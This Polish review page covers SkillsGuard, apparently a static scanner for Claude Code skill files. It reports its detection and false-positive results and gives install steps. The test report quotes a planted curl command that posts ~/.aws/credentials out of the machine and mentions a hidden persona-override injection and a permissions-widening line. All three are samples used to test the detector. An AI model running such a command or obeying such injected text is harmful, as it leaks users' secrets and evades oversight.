SkillsGuard

Statyczny skaner audytujący SKILL.md pod kątem wstrzykiwania, eksfiltracji i eskalacji

Autor: Teycir · Teycir/SkillsGuard

Działa po konfiguracji ★ 6.8/10

SkillsGuard — Statyczny skaner audytujący SKILL.md pod kątem wstrzykiwania, eksfiltracji i eskalacji

Co robi ten skill

Uruchamia statyczny skaner SkillsGuard — 15 kategorii reguł obejmujących wstrzykiwanie promptów, eksfiltrację, wstrzykiwanie poleceń, trwałość, eskalację uprawnień, zaciemnianie i łańcuch dostaw — dla pojedynczej umiejętności lub całego folderu umiejętności, a następnie formatuje wyniki w werdykt pogrupowany według ważności z rekomendacją instalacji / nieinstalowania. Dekoduje base64 i inne zaciemnione obiekty przed dopasowaniem, więc ładunki ukryte w zakodowanych ciągach są zgłaszane z zdekodowanymi dowodami. Uruchamia się na żądania takie jak scan this skill, is this skill safe, lub audit my skills folder.

Raport z testu

Silnik dekodujący jako pierwszy to prawdziwa rzecz: podłożono umiejętność, której setup.sh ukrywał `curl -X POST -d @<(cat ~/.aws/credentials)` w blobie base64, a skaner zdekodował to i zgłosił eksfiltrację poświadczeń, linię rozszerzającą uprawnienia settings.json oraz wstrzyknięcie persona-override ukryte w komentarzu HTML — 17 ustaleń w 16 ms, wszystkie trzy ataki wykryte. Precyzja jest problemem. Skierowany na prawdziwą bibliotekę 278 zainstalowanych umiejętności, wygenerował 15 480 ustaleń i ocenił cały folder na 100/100 CRITICAL, oznaczając 204 z 278 umiejętności jako HIGH lub gorsze; dwie najgłośniejsze reguły pasują do `rm` i `sh` bez granic słów, więc każdy kod markdown zawierający 'format' lub 'publish' jest zgłaszany jako wstrzyknięcie polecenia. Nieszkodliwa 14-liniowa umiejętność do robienia notatek, której jedyny backtick to `--format markdown`, wróciła jako MEDIUM z pięcioma HIGH ustaleniami 'command injection'. Nie ma jej również na npm — samo SKILL.md nic nie robi, a przed użyciem umiejętności należy sklonować, npm install, build i npm link (lub podłączyć serwer MCP). Przydatne jako szybkie wstępne sprawdzenie jednej podejrzanej umiejętności; nie ufaj werdyktowi na poziomie folderu.

Testowano: 2026-08-07 · Claude Code 2.x (agent harness)

Instalacja

git clone https://github.com/Teycir/SkillsGuard.git
mkdir -p ~/.claude/skills
cp -r SkillsGuard/skill ~/.claude/skills/skillsguard
# scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link

Komendy i przykładowe prompty

  • /skillsguardStatyczny skaner audytujący SKILL.md pod kątem wstrzykiwania, eksfiltracji i eskalacji

Skille uruchamiają się na zwykłe polecenia — bez komend do zapamiętania. Po instalacji aktywują go prompty takie jak te (po angielsku):

  • Can you scan this skill for prompt injection before I install it?
  • Is this Claude Code skill safe to install, any red flags?
  • Audit my whole ~/.claude/skills folder for exfiltration risks